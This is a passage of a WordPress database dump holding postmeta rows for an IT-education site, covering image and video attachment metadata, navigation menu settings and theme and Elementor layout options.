5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"Slide01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"Slide01-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Slide01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"Slide01-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1047,410,'_wp_attachment_image_alt','Database'),
(1048,411,'_wp_attached_file','2021/05/Slide02.jpg'),
(1049,411,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:19:\"2021/05/Slide02.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Slide02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Slide02-1024x720.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Slide02-768x720.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide02-280x180.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"Slide02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"Slide02-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Slide02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"Slide02-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Slide02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1050,411,'_wp_attachment_image_alt','Operation Systems'),
(1151,428,'_wp_attached_file','2021/05/Buttons_Databases01-e1621614447218.jpg'),
(1152,428,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:46:\"2021/05/Buttons_Databases01-e1621614447218.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-600x768.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-280x180.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"Buttons_Databases01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Buttons_Databases01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1153,428,'_wp_attachment_image_alt','Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB'),
(1154,428,'_edit_lock','1621625277:2'),
(1155,428,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:23:\"Buttons_Databases01.jpg\";}}'),
(1172,428,'_edit_last','2'),
(1366,464,'_wp_attached_file','2021/05/Buttons_OS01-e1621627479921.jpg'),
(1367,464,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2021/05/Buttons_OS01-e1621627479921.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-600x768.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-280x180.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Buttons_OS01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Buttons_OS01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1368,464,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:16:\"Buttons_OS01.jpg\";}}'),
(1369,464,'_wp_attachment_image_alt','Operation System'),
(1622,515,'_wp_attached_file','2021/05/Buttons_Security01-e1621661226935.jpg'),
(1623,515,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:45:\"2021/05/Buttons_Security01-e1621661226935.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-600x768.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-280x180.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"Buttons_Security01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Buttons_Security01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1624,515,'_wp_attachment_image_alt','Security'),
(1625,515,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:22:\"Buttons_Security01.jpg\";}}'),
(1720,532,'_wp_attached_file','2021/05/IT.mp4'),
(1721,532,'_wp_attachment_metadata','a:10:{s:8:\"filesize\";i:6016710;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:113;s:16:\"length_formatted\";s:4:\"1:53\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:1544083981;}'),
(1817,547,'_menu_item_type','taxonomy'),
(1818,547,'_menu_item_menu_item_parent','550'),
(1819,547,'_menu_item_object_id','8'),
(1820,547,'_menu_item_object','category'),
(1821,547,'_menu_item_target',''),
(1822,547,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1823,547,'_menu_item_xfn',''),
(1824,547,'_menu_item_url',''),
(1826,548,'_menu_item_type','taxonomy'),
(1827,548,'_menu_item_menu_item_parent','550'),
(1828,548,'_menu_item_object_id','50'),
(1829,548,'_menu_item_object','category'),
(1830,548,'_menu_item_target',''),
(1831,548,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1832,548,'_menu_item_xfn',''),
(1833,548,'_menu_item_url',''),
(1835,549,'_menu_item_type','taxonomy'),
(1836,549,'_menu_item_menu_item_parent','550'),
(1837,549,'_menu_item_object_id','71'),
(1838,549,'_menu_item_object','category'),
(1839,549,'_menu_item_target',''),
(1840,549,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1841,549,'_menu_item_xfn',''),
(1842,549,'_menu_item_url',''),
(1862,401,'_wp_old_date','2021-05-20'),
(1863,401,'_menu_item_megamenu','0'),
(1864,401,'_menu_item_nolink','0'),
(1865,401,'_menu_item_hide_label','0'),
(1866,401,'_menu_item_icon','auxicon-info-1'),
(1867,401,'_menu_item_icon_align',''),
(1868,401,'_menu_item_icon_align',''),
(1869,401,'_menu_item_row_start','0'),
(1870,401,'_menu_item_hide_title','0'),
(1871,401,'_menu_item_col_num','1'),
(1872,401,'_menu_item_hide_desktop','0'),
(1873,401,'_menu_item_hide_tablet','0'),
(1874,401,'_menu_item_hide_mobile','0'),
(1875,401,'_menu_item_sec_text',''),
(1876,401,'_menu_item_sec_bg_color',''),
(1877,401,'_menu_item_custom_style',''),
(1878,401,'_menu_item_aux_background_image',''),
(1879,401,'_menu_item_link_path',''),
(1880,547,'_menu_item_megamenu','0'),
(1881,547,'_menu_item_nolink','0'),
(1882,547,'_menu_item_hide_label','0'),
(1883,547,'_menu_item_icon',''),
(1884,547,'_menu_item_icon_align',''),
(1885,547,'_menu_item_row_start','0'),
(1886,547,'_menu_item_hide_title','0'),
(1887,547,'_menu_item_col_num','1'),
(1888,547,'_menu_item_hide_desktop','0'),
(1889,547,'_menu_item_hide_tablet','0'),
(1890,547,'_menu_item_hide_mobile','0'),
(1891,547,'_menu_item_sec_text',''),
(1892,547,'_menu_item_sec_bg_color',''),
(1893,547,'_menu_item_custom_style',''),
(1894,547,'_menu_item_aux_background_image',''),
(1895,547,'_menu_item_link_path',''),
(1896,548,'_menu_item_megamenu','0'),
(1897,548,'_menu_item_nolink','0'),
(1898,548,'_menu_item_hide_label','0'),
(1899,548,'_menu_item_icon',''),
(1900,548,'_menu_item_icon',''),
(1901,548,'_menu_item_icon_align',''),
(1902,548,'_menu_item_icon_align',''),
(1903,548,'_menu_item_row_start','0'),
(1904,548,'_menu_item_row_start','0'),
(1905,548,'_menu_item_hide_title','0'),
(1906,548,'_menu_item_hide_title','0'),
(1907,548,'_menu_item_col_num','1'),
(1908,548,'_menu_item_col_num','1'),
(1909,548,'_menu_item_hide_desktop','0'),
(1910,548,'_menu_item_hide_tablet','0'),
(1911,548,'_menu_item_hide_mobile','0'),
(1912,548,'_menu_item_sec_text',''),
(1913,548,'_menu_item_sec_bg_color',''),
(1914,548,'_menu_item_custom_style',''),
(1915,548,'_menu_item_aux_background_image',''),
(1916,548,'_menu_item_link_path',''),
(1917,549,'_menu_item_megamenu','0'),
(1918,549,'_menu_item_nolink','0'),
(1919,549,'_menu_item_hide_label','0'),
(1920,549,'_menu_item_icon',''),
(1921,549,'_menu_item_icon_align',''),
(1922,549,'_menu_item_row_start','0'),
(1923,549,'_menu_item_hide_title','0'),
(1924,549,'_menu_item_col_num','1'),
(1925,549,'_menu_item_hide_desktop','0'),
(1926,549,'_menu_item_hide_tablet','0'),
(1927,549,'_menu_item_hide_mobile','0'),
(1928,549,'_menu_item_sec_text',''),
(1929,549,'_menu_item_sec_bg_color',''),
(1930,549,'_menu_item_custom_style',''),
(1931,549,'_menu_item_aux_background_image',''),
(1932,549,'_menu_item_link_path',''),
(1933,550,'_menu_item_type','custom'),
(1934,550,'_menu_item_menu_item_parent','0'),
(1935,550,'_menu_item_object_id','550'),
(1936,550,'_menu_item_object','custom'),
(1937,550,'_menu_item_target',''),
(1938,550,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(1939,550,'_menu_item_xfn',''),
(1940,550,'_menu_item_url','http://ictbank.ir/blog/#'),
(1942,550,'_menu_item_megamenu','0'),
(1943,550,'_menu_item_nolink','0'),
(1944,550,'_menu_item_hide_label','0'),
(1945,550,'_menu_item_icon','auxicon-box-1'),
(1946,550,'_menu_item_icon_align',''),
(1947,550,'_menu_item_row_start','0'),
(1948,550,'_menu_item_hide_title','0'),
(1949,550,'_menu_item_col_num','1'),
(1950,550,'_menu_item_hide_desktop','0'),
(1951,550,'_menu_item_hide_tablet','0'),
(1952,550,'_menu_item_hide_mobile','0'),
(1953,550,'_menu_item_sec_text',''),
(1954,550,'_menu_item_sec_bg_color',''),
(1955,550,'_menu_item_custom_style',''),
(1956,550,'_menu_item_aux_background_image',''),
(1957,550,'_menu_item_link_path',''),
(1989,401,'_wp_old_date','2021-05-22'),
(1990,550,'_wp_old_date','2021-05-22'),
(1991,547,'_wp_old_date','2021-05-22'),
(1992,548,'_wp_old_date','2021-05-22'),
(1993,549,'_wp_old_date','2021-05-22'),
(2120,578,'_wp_attached_file','2021/06/What_is_Oracle_Database_and_why_to_use_it_Oracle_Database_Tutorial.mp4'),
(2121,578,'_wp_attachment_metadata','a:10:{s:8:\"filesize\";i:8530342;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:249;s:16:\"length_formatted\";s:4:\"4:09\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:1597469989;}'),
(2141,583,'_edit_lock','1682957923:2'),
(2143,583,'_format_quote_source_url',''),
(2144,583,'_format_quote_source_name',''),
(2145,583,'_format_audio_embed',''),
(2146,583,'_format_video_embed',''),
(2147,583,'_edit_last','2'),
(2149,583,'page_layout','default'),
(2150,583,'page_sidebar_style','default'),
(2151,583,'show_content_top_margin','default'),
(2152,583,'auxin_featured_color_enabled','0'),
(2153,583,'auxin_featured_color','#1bb0ce'),
(2154,583,'aux_post_title_show','default'),
(2155,583,'page_content_title_alignment','default'),
(2156,583,'aux_post_info_show','default'),
(2157,583,'post_content_style','default'),
(2158,583,'blog_single_show_media','default'),
(2159,583,'blog_archive_show_featured_image','default'),
(2160,583,'aux_title_bar_show','default'),
(2161,583,'subtitle_position','before'),
(2162,583,'aux_title_bar_preset','default'),
(2163,583,'aux_title_bar_enable_customize','0'),
(2164,583,'aux_title_bar_content_width_type','boxed'),
(2165,583,'aux_title_bar_content_section_height','auto'),
(2166,583,'aux_title_bar_title_show','1'),
(2167,583,'aux_title_bar_heading_bordered','0'),
(2168,583,'aux_title_bar_heading_boxed','0'),
(2169,583,'aux_title_bar_meta_enabled','0'),
(2170,583,'aux_title_bar_bread_enabled','1'),
(2171,583,'aux_title_bar_bread_bordered','0'),
(2172,583,'aux_title_bar_text_align','left'),
(2173,583,'aux_title_bar_overlay_pattern','none'),
(2174,583,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2175,583,'aux_title_bar_color_style','dark'),
(2176,583,'aux_title_bar_bg_show','0'),
(2177,583,'aux_title_bar_bg_parallax','0'),
(2178,583,'aux_title_bar_bg_size','cover'),
(2179,583,'_format_video_player_skin','default'),
(2180,583,'_format_audio_player_skin','default'),
(2181,583,'aux_custom_bg_show','0'),
(2182,583,'aux_custom_bg_repeat','repeat'),
(2183,583,'aux_custom_bg_attach','scroll'),
(2184,583,'aux_custom_bg_position','left top'),
(2185,583,'aux_custom_bg_size','auto'),
(2186,583,'aux_metafields_custom_styles',''),
(2187,387,'_elementor_controls_usage','a:4:{s:12:\"aux_menu_box\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:2:{s:7:\"general\";a:1:{s:9:\"menu_slug\";i:2;}s:19:\"mobile_menu_section\";a:3:{s:20:\"burger_menu_location\";i:2;s:14:\"display_burger\";i:2;s:10:\"breakpoint\";i:2;}}s:5:\"style\";a:3:{s:17:\"menu_item_section\";a:11:{s:5:\"align\";i:2;s:10:\"item_color\";i:2;s:25:\"menu_item_typo_typography\";i:2;s:26:\"menu_item_typo_font_family\";i:2;s:24:\"menu_item_typo_font_size\";i:2;s:31:\"menu_item_typo_font_size_tablet\";i:2;s:26:\"menu_item_typo_font_weight\";i:2;s:29:\"menu_item_typo_text_transform\";i:2;s:26:\"menu_item_typo_line_height\";i:2;s:16:\"item_hover_color\";i:1;s:12:\"item_padding\";i:2;}s:14:\"burger_section\";a:2:{s:16:\"burger_btn_color\";i:2;s:16:\"burger_btn_style\";i:2;}s:15:\"fullscr_section\";a:4:{s:18:\"fullscr_item_color\";i:2;s:33:\"fullscr_menu_item_typo_typography\";i:2;s:39:\"fullscr_menu_item_typo_font_size_mobile\";i:2;s:34:\"fullscr_menu_item_typo_font_weight\";i:2;}}s:8:\"advanced\";a:2:{s:17:\"_section_position\";a:2:{s:21:\"_element_width_mobile\";i:2;s:14:\"_element_width\";i:2;}s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:4:{s:12:\"_inline_size\";i:3;s:19:\"_inline_size_mobile\";i:3;s:5:\"align\";i:2;s:12:\"align_mobile\";i:1;}}}}s:8:\"aux_logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:7:\"general\";a:2:{s:5:\"align\";i:1;s:12:\"align_mobile\";i:1;}}s:8:\"advanced\";a:2:{s:17:\"_section_position\";a:2:{s:21:\"_element_width_mobile\";i:1;s:14:\"_element_width\";i:1;}s:22:\"aux_core_general_extra\";a:1:{s:20:\"aux_max_width_mobile\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:2:{s:3:\"gap\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:21:\"background_background\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}}'),
(2188,386,'_elementor_controls_usage','a:6:{s:8:\"aux_logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:8:\"advanced\";a:1:{s:17:\"_section_position\";a:1:{s:14:\"_element_width\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:4;s:16:\"content_position\";i:3;}}s:8:\"advanced\";a:2:{s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:3;}s:19:\"_section_responsive\";a:2:{s:11:\"hide_tablet\";i:1;s:11:\"hide_mobile\";i:1;}}}}s:12:\"aux_menu_box\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:7:\"general\";a:3:{s:9:\"menu_slug\";i:1;s:8:\"splitter\";i:1;s:9:\"indicator\";i:1;}s:19:\"mobile_menu_section\";a:3:{s:14:\"display_burger\";i:1;s:10:\"breakpoint\";i:1;s:20:\"burger_menu_location\";i:1;}}s:5:\"style\";a:1:{s:17:\"menu_item_section\";a:8:{s:10:\"item_color\";i:1;s:25:\"menu_item_typo_typography\";i:1;s:26:\"menu_item_typo_font_family\";i:1;s:24:\"menu_item_typo_font_size\";i:1;s:26:\"menu_item_typo_font_weight\";i:1;s:29:\"menu_item_typo_text_transform\";i:1;s:26:\"menu_item_typo_line_height\";i:1;s:16:\"item_hover_color\";i:1;}}}}s:14:\"aux_search_box\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:12:\"icon_section\";a:3:{s:9:\"icon_size\";i:1;s:10:\"icon_color\";i:1;s:11:\"icon_margin\";i:1;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}s:17:\"_section_position\";a:1:{s:14:\"_element_width\";i:1;}}}}s:12:\"social-icons\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:19:\"section_social_icon\";a:2:{s:16:\"social_icon_list\";i:1;s:5:\"shape\";i:1;}}s:5:\"style\";a:1:{s:20:\"section_social_style\";a:6:{s:10:\"icon_color\";i:1;s:18:\"icon_primary_color\";i:1;s:20:\"icon_secondary_color\";i:1;s:9:\"icon_size\";i:1;s:12:\"icon_padding\";i:1;s:12:\"icon_spacing\";i:1;}}s:8:\"advanced\";a:1:{s:17:\"_section_position\";a:1:{s:14:\"_element_width\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:3:{s:3:\"gap\";i:2;s:16:\"content_position\";i:1;s:13:\"content_width\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:1;}s:14:\"section_border\";a:2:{s:26:\"box_shadow_box_shadow_type\";i:1;s:21:\"box_shadow_box_shadow\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:2:{s:7:\"padding\";i:2;s:6:\"margin\";i:1;}s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:1;}}}}}'),
(2240,592,'_wp_attached_file','2021/12/banner01.png'),
